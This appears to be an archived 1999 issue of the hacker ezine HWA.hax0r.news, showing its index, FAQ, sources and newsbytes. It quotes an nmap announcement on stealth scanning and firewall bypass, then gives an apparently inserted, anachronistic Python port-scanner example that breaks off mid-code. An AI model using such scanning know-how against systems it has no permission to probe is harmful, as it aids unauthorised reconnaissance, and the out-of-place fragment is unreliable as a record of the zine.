💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn13.… captured on 2022-01-08 at 15:59:07.


    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                       <=-[ HWA.hax0r.news ]-=>                         =
  ==========================================================================
    [=HWA'99=]                         Number 13 Volume 1 1999 April 1st  99
  ==========================================================================
    [                     61:20:6B:69:64:20:63:6F:75:                    ]
    [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
    [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  ==========================================================================
  
   On writing 'too technical' in an English assignment ....
   
        she said "put it in laymen's terms"  
              i was thinking "you mean lamers' terms??" - <pr0xy_> *G*



                                 
                                  
                     010010             0101010101
                   01010101            0101010101010
                     010101                   010101
                     010101                01010101
                     010101                  01010101
                     010101                  010101010
                   0010101010          01010100101010
                   0101010101         0101010101010

  
  Note that some stuff may not display correctly as I did not fully convert
  all the text contained in this file to html, it is recommended you read 
  this file in standard text mode...
  
  
  
                         4445494c0494C554E4C554E 

  =------------------------------------------------------------------------=

  
  =------------------------------------------------------------------------=


   Synopsis 
   ---------
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see. (remember i'm doing
   this for me, not you, the fact some people happen to get a kick/use
   out of it is of secondary importance).

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  complement such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, it's a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>
   
   

   @HWA

   =-----------------------------------------------------------------------=

                     Welcome to HWA.hax0r.news ... #13

   =-----------------------------------------------------------------------=

          

    *******************************************************************
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    ***                                                             ***
    *** Note that the channel isn't there to entertain you its for  ***
    *** you to talk to us and impart news, if you're looking for fun***
    *** then do NOT join our channel try #wierdwigs or something... ***
    *** we're not #chatzone or #hack                                ***
    ***                                                             ***
    *******************************************************************


  =-------------------------------------------------------------------------=

  Issue #13         Artificial intelligence is no match for natural stupidity.


  =--------------------------------------------------------------------------=



  
  [ INDEX ]
  =--------------------------------------------------------------------------=
    Key     Content                                                         
  =--------------------------------------------------------------------------=
 
    00.0  .. COPYRIGHTS ......................................................
    00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
    00.2  .. SOURCES .........................................................
    00.3  .. THIS IS WHO WE ARE ..............................................
    00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
    00.5  .. THE HWA_FAQ V1.0 ................................................

    01.0  .. GREETS ..........................................................
     01.1 .. Last minute stuff, rumours, newsbytes ...........................
     01.2 .. Mailbag .........................................................
    02.0  .. From the Editor.................................................. 
    03.0  .. Why Business Fears Distributed Attacks...........................               
    04.0  .. April Popular Mechanics article: Hackers and Crackers............ 
    05.0  .. What IS frame spoofing etc anyways?..............................
    06.0  .. What should I fear from Java and ActiveX?........................
    07.0  .. Some cool geek code (leetbuzz.c) to roll your led's from root....
    08.0  .. Building a packet sniffer from the ground up Part I..............
    09.0  .. CIAC Security advisory on HP-UX ftp,hpterm.......................
    10.0  .. Sendmail DoS on versions up to latest 8.9.3......................
    11.0  .. Xylan Omniswitch 'features' (DoS)................................
    12.0  .. xfs (font server for X) bug, exploitability warning..............
     12.1  .. xfsx.sh - Very simple shell script exploit code for the recently
              discovered xfs security hole. By ArchAng3| of Death, Midgard 
              Security Team. .................................................      
    13.0  .. Bug allows remote systems to read local files remotely in MSIE5
    14.0  .. Possible root/user level compromise in SCO TermVision............
    15.0  .. Linux INSMOD exploit/vulnerability...............................
    16.0  .. Webramp DoSability...............................................
    17.0  .. HP Security bulletins (March 31).................................
    18.0  .. VENGINE polymorphic mutation engine for the Melissa virus w/code.
     18.1 .. [ISN] Virus camp split over melissa virus........................
     18.2 .. [ISN] The Anarchic Lure of Virus Writing ........................
     18.3 .. A shadowy bunch...Philly Inquirer................................
     18.4 .. National Post "Hang Hackers like Coin Clippers"..................
     18.5 .. Second victim, erh suspect fingered on Melissa virus in Europe...
    19.0  .. Various vulnerabilities;.........................................
              1. Overflow in CAC.Washington.EDU ipop3d 4.xx...................
              2. Overflow in pine 4.xx (Linux)................................
              3. Lockfile vulnerability in pine 4.xx (Linux)..................
              4. Lockfile vulnerability in ipop3d 4.xx........................
              5. Linux 2.x IPC vulnerability..................................
              6. Linux 2.x mmap vulnerability.................................
              7. Midnight Commander 4.x bugs (x2).............................
    20.0  .. AOLwatch news....................................................
    21.0  .. AntiOnline and hacker attacks....................................
    22.0  .. NATO fights Serbs online.........................................
    23.0  .. Chicago man sues employer over having weak voicemail security....
    24.0  .. Mitnick speaks in a rare Q and A, (Forbes).......................
    25.0  .. Australian stock exchange to carry out threat on Y2K slackers....
    26.0  .. Hack your Palm V to add eight mb of ram!.........................
    27.0  .. MDT software mentioned in last issue warrants arrests............
    28.0  .. Hot on the trail of infamous hacker/cracker Zyklon, BUSTED!......
     28.1 .. Rebuttal by Fluxx;..............................................
    29.0  .. Atlanta based ISS looks to hire hackers from OZ..................
    30.0  .. More on hacktivism from the Boston Globe.........................
    31.0  .. Some nasty WinGate 3.0 DoS's, password fun and other probs.......
    32.0  .. Sekure team releases problems found with ISS-scanner (rewt sploit!)
    33.0  .. FileGuard crack, security vulnerabilities........................
    34.0  .. Linux system administration mini-howto by Pestilence ............
    35.0  .. Guide to using NMAP by Lamont Granquist .........................
    36.0  .. Digital Unix 4.0 has potential root compromise in /var perms.....
    37.0  .. Running Procmail <v3.l2? time to upgrade...(overflow conditions).
     37.1 .. More procmail problems...........................................
    38.0  .. Security hole in Java 2 (and JDK 1.1.x)..........................
    39.0  .. Salon buys The Well..............................................
    40.0  .. Gspot bounix interface replacement with enhancements from HiR....
    41.0  .. Network Associates unveils middleware............................
    42.0  .. [ISN] Book review: "Hacker Proof" Lars Klander 1997 .............
    43.0  .. [ISN] The Year of PKI (Public Key Infrastructure)................
        
    =--------------------------------------------------------------------------=   
    AD.S  .. Post your site ads or etc here, if you can offer something in return
             thats tres cool, if not we'll consider ur ad anyways so send it in.
             ads for other zines are ok too btw just mention us in yours, please
             remember to include links and an email contact. Corporate ads will
             be considered also and if your company wishes to donate to or 
             participate in the upcoming Canc0n99 event send in your suggestions
             and ads now...n.b date and time may be pushed back join mailing list
             for up to date information.......................................
             Current dates: Aug19th-22nd Niagara Falls...    .................

    HA.HA  .. Humour and puzzles  ............................................
              "How to be a skr1pT Kiddi3" by DrHamstuh........................

              Hey You!........................................................
              =------=........................................................
              Send in humour for this section! I need a laugh and its hard to
              find good stuff... ;)...........................................

    HOW.TO .. "How to hack" by our illustrious editor.........................
    SITE.1 .. Featured site, .................................................
     H.W   .. Hacked Websites  ...............................................
     A.0   .. APPENDICES......................................................
     A.1   .. PHACVW linx and references......................................
 
  =--------------------------------------------------------------------------=
     
     @HWA'99

     
  00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
     OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
     WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
     (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
     READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

     Important semi-legalese and license to redistribute:

     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
     AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
     ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
     IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
     APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
     ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
     ME PRIVATELY current email cruciphux@dok.org

     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
     WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
     THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
     AND REDISTRIBUTE/MIRROR. - EoD


     Although this file and all future issues are now copyright, some of
    the content holds its  own copyright and these are printed and
    respected. News is news so i'll print any and all news but will quote
    sources when the source is known, if its good enough for CNN its good
    enough for me. And i'm doing it for free on my own time so pfffft. :)

    No monies are made or sought through the distribution of this material.
    If you have a problem or concern email me and we'll discuss it.

    cruciphux@dok.org

    Cruciphux [C*:.]



  00.1  CONTACT INFORMATION AND MAIL DROP
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.

    Send all goodies to:

	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5

    WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
    ~~~~~~~  reading this from some interesting places, make my day and get a
             mention in the zine, send in a postcard, I realize that some places
             it is cost prohibitive but if you have the time and money be a cool
             dude / gal and send a poor guy a postcard preferably one that has some
             scenery from your place of residence for my collection, I collect stamps
             too so you kill two birds with one stone by being cool and mailing in a
             postcard, return address not necessary, just a  "hey guys being cool in
             Bahrain, take it easy" will do ... ;-) thanx.



    Ideas for interesting 'stuff' to send in apart from news:

    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.

    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>

    Our current email:

    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA



  00.2  Sources ***
        ~~~~~~~~~~~

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance). Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux, no copyright claimed.

    HiR:Hackers Information Report... http://axon.jccc.net/hir/
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ ...............http://www.l0pht.com/
    NewsTrolls (HNN)..................http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD ..............................http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+........................http://www.gammaforce.org/
    News site+........................http://www.projectgamma.com/


    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
    http://www.ottawacitizen.com/business/
    http://search.yahoo.com.sg/search/news_sg?p=cracker
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
    http://www.zdnet.com/zdtv/cybercrime/
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

    NOTE: See appendices for details on other links.


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    http://freespeech.org/eua/ Electronic Underground Affiliation
    http://www.l0pht.com/cyberul.html
    http://www.hackernews.com/archive.html?122998.html
    http://ech0.cjb.net ech0 Security
    http://net-security.org Net Security

    ...


    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~

    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and it may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed

    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector address
    if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)


    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09

                          ISSN  1004-042X

           Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
           News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
           Archivist: Brendan Kehoe
           Poof Reader:   Etaion Shrdlu, Jr.
           Shadow-Archivists: Dan Carosone / Paul Southworth
                              Ralph Sims / Jyrki Kuoppala
                              Ian Dickinson
           Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed


    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA


  00.3  THIS IS WHO WE ARE
        ~~~~~~~~~~~~~~~~~~
 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black


      Foreign Correspondents/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ATTENTION: All foreign correspondents please check in or be removed by next
      issue  I need  your current emails since contact info was recently lost in a
      HD mishap and i'm not carrying any deadweight. Plus we need more people sending
      in info, my apologies for not getting back to you if you sent in January I lost
      it, please resend.



       N0Portz ..........................: Australia
       Qubik ............................: United Kingdom
       system error .....................: Indonesia
       Wile (wile coyote) ...............: Japan/the East
       Ruffneck  ........................: Netherlands/Holland

       And unofficially yet contributing too much to ignore ;)

       Spikeman .........................: World media

       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form. Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



  00.4  Whats in a name? why HWA.hax0r.news??
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. It's almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

  00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

  01.0  Greets!?!?! yeah greets! w0w huh. - Ed
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet           Pyra           Pasty Drone
     TwstdPair          TheDuece       _NeM_
     D----Y             RTFM99         Kevin Mitnick (watch yer back)
     ypwitch            kimmie         vexxation
     hunchback mack     sAs72          Spikeman
     
     and the #innerpulse, #hns crew and some inhabitants of #leetchans .... 
     although I use the term 'leet loosely these days, <k0ff><snicker>  ;)
       
     
     kewl sites:

     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.genocide2600.com/
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/

     @HWA


  01.1  Last minute stuff, rumours and newsbytes
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
                         
                           
                           
     

    +++ When was the last time you backed up your important data?
    
     ++ From securitysearch.net

        We are pleased to inform you that Shake Communications has developed
        Security Search - an IT security search engine and portal web site. As you
        would expect, Security Search is free to use, and intended to become the
        No.1 web site for finding information about IT security. 


        To view Security Search visit http://www.securitysearch.net


        Please feel free to enter your company or personal and web site details
        into the search engine. Also, if you wish to advertise on the site at any
        stage please let us know. 


        Finally, if you have any suggestions or ideas for improvement we would
        love to hear them. 


        Security Search
        The Internet Security Search Engine
        <a href="http://www.securitysearch.net/">Link</a>


     
     ++  contributed to HNN by Seraphic Artifex 
         Swatch is planning to broadcast a series of voice and
         HTML text messages via an orbiting amateur
         communications satellite in direct violation of
         International Telecommunications Union treaty and U.S.
         FCC regulations. Needless to say HAM Radio enthusiasts
         are more than a little upset and have started a boycott of Swatch
        
         <a href="http://www.wired.com/news/news/technology/story/18968.html">Wired Story</a>
         <a href="http://wmbc.umbc.edu/rob/swatch-protest/">Swatch Protest site</a>
         <a href="http://www.reston.com/nasa/watch.html">Nasa Watch</a>
         <a href="http://www.hackernews.com/">HNN</a>
         
     ++  contributed to HNN by Code Kid 
         Los Alamos National Laboratory, Sandia National
         Laboratories in Albuquerque and the Lawrence Livermore
         National Laboratory in California have all suspended the
         use of classified systems in an effort to raise security awareness. 

         <a href="http://www.msnbc.com/news/256510.asp">MSNBC</a>
         <a href="http://www.zdnet.com/zdnn/stories/news/0,4586,2237463,00.html">ZD Net</a>
         <a href="http://www.hackernews.com/">HNN</a>    
     
     ++  nmap v2.12 is out! "nmap is a utility for port scanning large networks,
         although it works fine for single hosts. The guiding philosophy for the
         creation of nmap was TMTOWTDI (There's More Than One Way To Do It). This is 
         the Perl slogan, but it is equally applicable to scanners. Sometimes you need
         speed, other times you may need stealth. In some cases, bypassing firewalls 
         may be required. Not to mention the fact that you may want to scan different
         protocols (UDP, TCP, ICMP, etc.). You just can't do all this with one scanning
         mode. And you don't want to have 10 different scanners around, all with different
         interfaces and capabilities. Thus I [Fyodor] incorporated virtually every scanning
         technique I [Fyodor] know into nmap. Specifically, nmap supports: Vanilla TCP 
         connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth)
         scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP 
         fragments (bypasses packet filters), UDP raw ICMP port unreachable scanning, ICMP
         scanning (ping-sweep), TCP Ping scanning, Remote OS Identification by TCP/IP 
         Fingerprinting, and Reverse-ident scanning. nmap also supports a number of 
         performance and reliability features such as dynamic delay time calculations, 
         packet timeout and retransmission, parallel port scanning, detection of down hosts
         via parallel pings. Nmap also offers flexible target and port specification, decoy
         scanning, determination of TCP sequence predictability characteristics, and output
         to machine parseable or human readable log files." --  Fyodor. Changes: -sT now uses 
         a different method to determine the results of a non-blocking connect() call 
         (makes nmap more portable), got rid of the security warning message for people who 
         are missing /dev/random and /dev/urandom due to complaints about the warning (note:
         This only silences the warnings -- it still uses relatively weak random number 
         generation under Solaris and other systems that lack this functionality), eliminated
         pow() calls on Linux boxes to rectify a SIGSEGV condition, fixed an rpm problem. 
         322k. By Fyodor. http://www.insecure.org/nmap/ 
         <a href="http://www.insecure.org/nmap/">nmap</a>
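
         The -sT (connect()) mode mentioned in the changelog above is the one scan type that needs
         no raw sockets, so it is the easiest to demonstrate. What follows is an added example
         written for this issue, not code from nmap or Fyodor: a parallel non-blocking connect()
         scanner that reads the handshake result back through SO_ERROR, the same portability
         problem the changelog refers to. It scans a throwaway listener on 127.0.0.1 that the
         script itself constructs, so the host and ports are assumptions, not real targets.

```python
"""Parallel TCP connect() scan with non-blocking sockets (added example, not nmap's code).

Scans a local listener that the script creates itself, so it runs offline. Target host
and ports are constructed for the example.
"""
import errno
import selectors
import socket
import time

IN_PROGRESS = (errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN)


def start_listener(host="127.0.0.1"):
    """Bind a throwaway listener so there is one guaranteed-open port to scan."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
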